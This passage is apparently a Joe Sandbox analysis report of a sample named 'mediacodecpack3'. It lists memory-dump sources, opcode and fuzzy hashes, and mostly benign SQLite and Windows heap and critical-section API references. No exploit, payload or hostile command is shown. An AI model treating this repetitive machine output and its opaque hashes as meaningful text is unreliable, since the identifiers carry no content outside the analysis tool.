                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_value_text
                                                                                            • String ID: string or blob too big
                                                                                            • API String ID: 2320820228-2803948771
                                                                                            • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                            • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                            • String ID:
                                                                                            • API String ID: 3265351223-3916222277
                                                                                            • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                            • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: log
                                                                                            • API String ID: 912767213-2403297477
                                                                                            • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                            • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_strnicmp
                                                                                            • String ID: SQLITE_
                                                                                            • API String ID: 1961171630-787686576
                                                                                            • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                            • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                            APIs
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                            Strings
                                                                                            • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: Invalid argument to rtreedepth()
                                                                                            • API String ID: 1063208240-2843521569
                                                                                            • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                            • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                            APIs
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                              • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                              • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: soft_heap_limit
                                                                                            • API String ID: 1251656441-405162809
                                                                                            • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                            • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                            APIs
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: NULL
                                                                                            • API String ID: 632333372-324932091
                                                                                            • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                            • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                            APIs
                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3499195154-0
                                                                                            • Opcode ID: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                            • Instruction ID: 2adbec297c34dc3d5fc58a6281b1bdaad71761cfda4098cfa9d0d345734132fa
                                                                                            • Opcode Fuzzy Hash: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                            • Instruction Fuzzy Hash: 2D114C70250701DFD7308F28EE85E127BB5F7867207108B3DEAA1E25E0D7359845CB08
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeavefree
• String ID:
• API String ID: 4020351045-0
• Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
• Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
• Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
• Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
APIs
• EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
• TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
• GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
• LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
• Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2